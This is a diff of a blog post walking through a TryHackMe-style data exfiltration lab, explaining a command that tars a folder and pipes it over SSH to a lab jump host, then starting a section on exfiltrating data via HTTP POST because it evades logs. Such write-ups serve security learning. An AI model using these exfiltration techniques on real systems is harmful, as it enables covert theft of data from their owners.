CSpanias/cspanias.github.io/_posts/2023-10-20-Data Exfiltration.md

 ![Files to be trasmitted](task5-creds.png)

-We will use the same method as before to archive the data, but this time instead of redictering them through an TCP socket, we will send the standard output via SSH:
+We will use the same method as before to archive the data, but this time instead of redictering them through a TCP socket, we will send the standard output via SSH:

 ```shell
 tar zcf - task5/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -"
 ```

 The above command creates a tarball and sends it over SSH to the Jumpbox SSH server for extraction.
+SSH clients provide a way to execute a single command without having a full session.
 Let's break it down step by step:

 1. `tar zcf - task5/` We have seen this part of the command before, which compresses and archives the data.

 2. `|` We have also seen what the *pipe operator* does.

-3. `ssh thm@jump.thm.com "cd /tmp/; tar xpf -"` This part of the command uses the ssh command to establish an SSH connection to the remote server "*jump.thm.com*" with the username "*thm*".
-Here's what's happening in the SSH command:
+3. `ssh thm@jump.thm.com "cd /tmp/; tar xpf -"` This part of the command uses the `ssh` command to establish an SSH connection.
+Here's what's happening:
-    - `ssh thm@jump.thm.com` Initiates an SSH connection to the remote server "*jump.thm.com*" with the username "*thm*".
+    - `ssh thm@jump.thm.com` Initiates an SSH connection to the remote server `jump.thm.com` with the username `thm`.
     - `"cd /tmp/; tar xpf -"` This part is executed on the remote server after the SSH connection is established.
-It changes the working directory to "*/tmp*", and then extracts a tarball from standard input (indicated by `-`).
+It changes the working directory to `/tmp`, and then extracts a tarball from standard input.
 The `p` options is used to preserve file permissions, ownership, and timestamps when extracting files.
 This ensures that the extracted files retain their original attributes.

 ![SSH transmission](ssh-transmission.png)

-# HTTP(S) Exfiltration
+# 5. HTTP(S) Exfiltration

+## 5.1 HTTP POST Request

 Data Exfiltration through HTTP(S) is one of the best methods, as it hard to distinguish between legitimate and malicious HTTP traffic.
 We will be using the **POST HTTP request**, as with a **GET HTTP request**, all parameters are registered into the log file.
 POST HTTP requests:
 - Are never cached.